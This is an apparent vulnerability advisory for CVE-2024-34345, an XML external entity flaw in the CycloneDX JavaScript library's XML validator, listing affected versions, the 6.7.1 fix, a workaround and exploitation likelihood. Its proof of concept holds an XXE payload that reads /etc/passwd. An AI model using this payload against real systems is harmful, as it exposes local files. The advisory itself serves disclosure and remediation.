CVE-2024-34345
@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability
Description
### Impact XML External entity injections could be possible, when running the provided XML Validator on arbitrary input. #### POC ```js const { Spec: { Version }, Validation: { XmlValidator } } = require('@cyclonedx/cyclonedx-library'); const version = Version.v1dot5; const validator = new XmlValidator(version); const input = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <bom xmlns="http://cyclonedx.org/schema/bom/1.5"> <components> <component type="library"> <name>testing</name> <version>1.337</version> <licenses> <license> <id>&xxe;</id><!-- << XML external entity (XXE) injection --> </license> </licenses> </component> </components> </bom>`; // validating this forged(^) input might lead to unintended behaviour // for the fact that the XML external entity would be taken into account. validator.validate(input).then(ve => { console.error('validation error', ve); }); ``` ### Patches This issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1 `. ### Workarounds Do not run the provided XML validator on untrusted inputs. ### References * issue was introduced via <https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063>.
How to fix CVE-2024-34345
To remediate CVE-2024-34345, upgrade the affected package to a fixed version below.
- —upgrade to 6.7.1 or later
Is CVE-2024-34345 being exploited?
Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- >= 6.7.0, < 6.7.1